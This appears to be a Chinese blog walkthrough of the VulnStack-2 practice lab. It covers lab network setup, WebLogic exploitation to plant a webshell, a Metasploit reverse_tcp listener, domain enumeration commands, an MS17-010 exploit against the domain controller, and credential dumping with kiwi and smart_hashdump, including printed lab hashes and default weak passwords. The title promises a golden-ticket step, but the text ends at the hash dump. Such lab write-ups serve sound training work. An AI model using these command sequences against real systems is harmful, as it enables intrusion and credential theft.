news 2026/9/13 10:04:58

内网横向——VulnStack-2靶场万字详细解析教程(MSF渗透,黄金票据利用)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网横向——VulnStack-2靶场万字详细解析教程(MSF渗透,黄金票据利用)

本教程围绕 VulnStack-2 靶场展开,从外网信息收集、漏洞利用获取初始权限入手,逐步讲解内网横向移动、黄金票据提权的完整渗透流程,带你沉浸式体验真实内网攻防场景。

文章目录

    • 靶场介绍
      • 攻击技术
      • 网络配置信息
      • 内网网段设置
      • NAT网段设置
    • 靶机设置
      • WEB.de1ay主机配置
        • 登陆WEB主机
        • WEB网络配置
      • PC.de1ay主机配置
      • DC.de1ay主机配置
    • 信息收集
      • 目标网段扫描
    • 漏洞利用获取主机权限
      • 发现Weblogic漏洞
      • Weblogic漏洞利用
      • 冰蝎连接生成shell
      • 通过冰蝎将WebLogic服务器上线到Metasploit
      • 内网信息收集成功getshell
    • 后渗透:密码复用和权限提升(黄金票据
    • 总结

靶场介绍

攻击技术

本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

  1. Bypass UAC
  2. Windows系统NTLM获取(理论知识:Windows认证)
  3. Access Token利用(MSSQL利用)
  4. WMI利用
  5. 网页代理,二层代理,特殊协议代理(DNS,ICMP)
  6. 域内信息收集 域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
  7. 域凭证收集
  8. 后门技术(黄金票据/白银票据/Sid
    History/MOF)

网络配置信息

关于靶场统一登录密码:1qaz@WSX

  • 内网网段:10.10.10.0/24

  • DMZ网段:192.168.44.0/24

防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问);

内网网段设置

首先打开"编辑“——”虚拟网络编辑器“:


然后点击”更改设置“——创建一个新的VMnet,并将网段设置为:

  • 子网:10.10.10.0
  • 子网掩码:255.255.255.0

(DHCP设置里的设置与上面的一样即可)

NAT网段设置

具体设置与内网网段差不多:

这里我设置的是192.168.44.0/24

靶机设置

WEB.de1ay主机配置

登陆WEB主机

我们首先设置给WEB主机两个网络适配器:


随后在尝试登陆WEB.de1ay.com时,输入密码我们会发现登录失败:

是因为我们此时登录的用户是web\de1ay而不是de1ay\de1ay

两者是不同的账号,密码自然不一样;

所以我们需要点击快照 —>返回到v1.3 —>然后点击放弃 —>放弃后再开机 —>用其他用户 —>输入账号密码

  • 一定要点击放弃,不然就会改变v1.3快照的状态,只能删掉重新安装WEB主机
de1ay\de1ay 1qaz@WSX


这个时候我们即可成功登录WEB主机,成功切换为de1ay\de1ay用户

WEB网络配置

接下来我们要修改网络设置,先查看修改配置前的网段:

  • 10.10.10.80
  • 192.168.111.80

随后”控制面板“—>”网络和Internet


”网络和共享中心“ —>”更改适配器设置“


”分别右键两个网卡“ —>”属性“ :


”输入管理员账号密码“ —>

用户名:de1ay\administrator 密码:1qaz@WSX


“双击ipv4协议-属性”—>“自动获得ip地址和DNS地址”

随后我们重新输入命令ipconfig查看IP地址:

  • NAT网段:192.168.44.163
  • 内网网段:10.10.10.10

成功进行修改;

PC.de1ay主机配置

同样是配置两个网段:

首先查看一下未修改前的网络:

  • 192.168.111.201
  • 10.10.10.201

网络配置还是一样的步骤:打开控制面板——更改网络适配器设置(两个本地连接都需要修改)

de1ay\administrator 1qaz@WSX


自动获取IP地址和DNS服务器:


随后查看修改后的IP地址:

  • NAT网段:192.168.44.164
  • 内网网段:10.10.10.11

DC.de1ay主机配置

直接输入密码1qaz@WSX进入主机,网络配置还是和之前一样:


(这个主机只配置内网网卡)

步骤不再赘述:

查看IP地址
未修改前:

修改后:

  • 内网网段:10.10.10.12

至此,三台主机的网络配置均已完成,接下来就进行我们的渗透横向操作;

信息收集

靶机环境网络拓扑示意图:


(PC的内网网段是10.10.10.11,图中标错了)

  • Web服务器,设置双网卡
  • 域成员主机,同样双网卡的设置;
  • 内网的域控主机,只需设置内网网段,保证内网主机彼此互通,且无法访问外网;

完成上述操作后,开启各主机;

  • 开启Web服务器的WebLogic服务,即在C:\Oracle\Middleware\user_projects\domains\base_domain\bin目录下;
  • 管理员身份运行文件名为startWebLogic的Windows命令脚本;


启动成功后,实时显示服务;

目标网段扫描

这里我们打开Kali,对目标Web服务器的NAT网段192.168.44.0/24进行基本的信息收集:

  • kali的IP地址为:192.168.44.146
# 搜索目标主机IPnmap -sP192.168.44.0/24# 收集端口以及服务信息nmap -sC -sV -A -T4 -p-192.168.44.163

继续收集详细的信息:



从收集到的信息我们可以看见目标Web服务器开放了不少服务端口:

  • 80/tcp:HTTP服务,基础的网页浏览Web服务
  • 135/tcp:MSRPC(微软远程过程调用),用于Windows进程间通信
  • 139/tcp:NetBIOS-SSN,Windows文件、打印机共享等功能的会话服务
  • 445/tcp:基于SMB协议的Windows文件/打印机共享服务
  • 1433/tcp:微软SQL Server数据库的默认服务端口
  • 3389/tcp:MS-WBT-Server,Windows远程桌面(RDP)的服务端口
  • 7001端口:通常对应OracleWebLogic Server服务,用于其管理控制台或Web应用部署的HTTP服务

漏洞利用获取主机权限

发现Weblogic漏洞

这里我们打开Web页面,发现确实一篇空白:

于是我们只好访问7001端口(Weblogic服务):http://192.168.44.163:7001/

可以发现是很标准的Weblogic报错页面;

随后我们进入到他的后台登陆地址:http://192.168.44.163:7001/console/login/LoginForm.jsp

我们要知道的是:Weblogic是存在弱口令以及其他RCE漏洞的;

漏洞类型对应编号/内容
SSRFCVE-2014-4210
任意文件上传CVE-2018-2894
XMLDecoder反序列化CVE-2017-3506
Java反序列化CVE-2015-4852
弱口令Weblogic / Oracle@123

(还有很多CVE,这里只是很少一部分);

# 默认的弱口令:system/password system/Passw0rd weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem
  • 对于刚入门的师傅来说,我是强烈推荐手工使用BP抓包,并按照payload去访问漏洞的;
    • 因为手工注入能够巩固练习你的能力,而不是只简单成为一个脚本小子
  • 自动化工具使用

这里为了节省时间,我使用工具对网站进行渗透:


我简单的测试了几个,可以发现确实是存在漏洞的;

Weblogic漏洞利用

冰蝎连接生成shell

我们根据上述存在漏洞,随便选一个进行shell注入:

随后用冰蝎访问,选择jsp文件,成功连接:


通过冰蝎将WebLogic服务器上线到Metasploit

这个MSF是Java类型的(受限),相比正常执行payload反弹的会话是不一样的;

  • 至此,我们已经成功获得了Web服务器的webshell,且该webshell的权限为普通用户web\de1ay的权限,因此接下来需要进行提权操作。
  • 思路:通过冰蝎将我们的恶意程序上传,并以管理员权限运行;

先生成一个payload:(x64的会失败,所以用x86的)

然后将其上传到WEB机器上;

随后kali建立监听:

use exploit/multi/handlersetpayload windows/meterpreter/reverse_tcpsetlhost192.168.44.131setlport8888run


成功上线,得到WEB主机的SYSTEM权限;


内网信息收集成功getshell

因为内网的信息收集涉及的范围十分的广,所以这里简单的说一下:

进入shell后,执行命令,收集信息:

net view# 查看局域网内其他主机名net config Workstation# 查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user# 查看本机用户列表net user /domain# 查看域用户net localgroup administrators# 查看本地管理员组(通常会有域用户)net view /domain# 查看有几个域net user 用户名 /domain# 获取指定域用户的信息net group /domain# 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)net group 组名 /domain# 查看域中某工作组net group"domain admins"/domain# 查看域管理员的名字net group"domain computers"/domain# 查看域中的其他主机名net group"doamin controllers"/domain# 查看域控制器主机名(可能有多台)

具体过程可以看这篇文章:内网横向——Vulnstack-1靶场复现(万字解析手把手教学)

随后对内网进行信息收集后,知道了域控IP为:10.10.10.12

随后对域控进行永恒之蓝漏洞的探测:

use auxiliary/scanner/smb/smb_ms17_010setrhosts10.10.10.10 run


确实存在;

尝试使用msf内置的漏洞利用模块:

use exploit/windows/smb/ms17_010_psexecsetrhosts10.10.10.12setpayload windows/x64/meterpreter/bind_tcpsetlport443run


成功拿到域控主机的权限;

后渗透:密码复用和权限提升(黄金票据

接下来我们对域进行信息收集,首先我们在之前的Web服务器上加载kiwi,提取服务器上储存的密码:

  • 会话1和3是WEB主机的administrator和SYSTEM权限
  • 而会话4就是永恒之蓝获取的域控DC的SYSTEM权限
sessions4load kiwi creds_all


我们成功提取到了两个账号的明文密码,但是这里没有域管理员的账号密码。

这里我们使用smart_hashdump模块提取域控中的哈希:

use post/windows/gather/smart_hashdumpsetsession4run

执行命令,获得的结果如下:

[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24[+]krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb[+]de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24[+]mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24[+]DC$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0[+]PC$:1105:aad3b435b51404eeaad3b435b51404ee:ce3e307123b59b4c481286308ae8fc2b[+]WEB$:1603:aad3b435b51404eeaad3b435b51404ee:f4f5b9220fe6871db01b9a336cb1a1ba

成功提取到了域内成员的hash值,并且我们发现域管理员的hash和其它域成员的hash相同,这说明域管理员使用了和域成员相同的密码

(该靶场存在密码复用,如果密码不相同,我们可以通过哈希传递进行横向移动),这样我们可以就获得了域管理员的账号密码。

总结

通过本次 VulnStack-2 靶场实战,我们完整走完从外网打点到内网横向渗透、黄金票据提权的全流程,掌握了 MSF 联动内网信息收集、权限复用等关键技巧。
不仅深化了内网攻防逻辑的理解,更建立起从漏洞发现到权限维持的完整思维链。靶场是技术试金石,持续复盘与实践,才能在真实对抗中快速响应、精准突破,让渗透能力在实战打磨中稳步提升。

期待下次再见;

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/11 20:32:29

安捷伦 Keysight 16195B 是德 16195B 校准套件

是德科技 16195B校准套件‌主要用于高频阻抗测量仪的校准,特别是在7 mm接头平面上进行校准。该套件包含以下组件: E4991-60021 (SHORT)、 E4991-60022 (OPEN)以及一个50欧姆的负载,频率范围为DC…

作者头像 李华
网站建设 2026/9/7 8:27:03

力科Teledyne LeCroy PP024 示波器探头 PP024-2

力科PP024探头 是一款无源衰减探头,适用于示波器,具有10:1的衰减值和500MHz的带宽。‌ 该探头的输入电阻为10MΩ,最大电压值为CAT I 500V和CAT II 400V,输入电容为10pF,电缆长度为51.181英寸(约1300毫米&am…

作者头像 李华
网站建设 2026/9/7 20:39:57

springboot旅游旅行攻略网站的设计与实现vue

目录系统架构设计核心功能模块技术实现要点扩展功能设计部署方案开发技术源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!系统架构设计 SpringBoot旅游旅行攻略网站采用前后端分离架构,后端使用SpringBoot框架提供RESTful A…

作者头像 李华
网站建设 2026/9/4 9:29:51

【dz-670】基于单片机的智能化光伏发电监控与管理系统设计

基于单片机的智能化光伏发电监控与管理系统 摘要:当前全球能源需求持续增长,同时对环境保护的重视程度也日益提高,光伏发电作为一种有清洁、可再生特性的能源技术,已获得广泛应用,本文设计了一种以单片机为基础的智能化…

作者头像 李华
网站建设 2026/9/10 9:41:21

ZUI15 平板充电样式怎么改?个性化设置教程来了!

对于使用联想 ZUI15 系统平板的用户来说,细节处的个性化定制总能让设备更具专属感。充电时的显示样式看似是小细节,却能在日常使用中带来不一样的仪式感 —— 单调的默认样式看久了难免乏味,不少小伙伴都在寻找更改充电样式的方法&#xff0c…

作者头像 李华
网站建设 2026/9/8 7:05:24

计算机毕设Java基于微信小程序的社区志愿者服务管理系统 基于微信小程序的社区志愿服务管理平台的Java开发实践 微信小程序环境下Java实现的社区志愿者服务管理系统设计

计算机毕设Java基于微信小程序的社区志愿者服务管理系统76x8l9(配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。 随着社会的快速发展,社区志愿服务在促进社区和谐与提…

作者头像 李华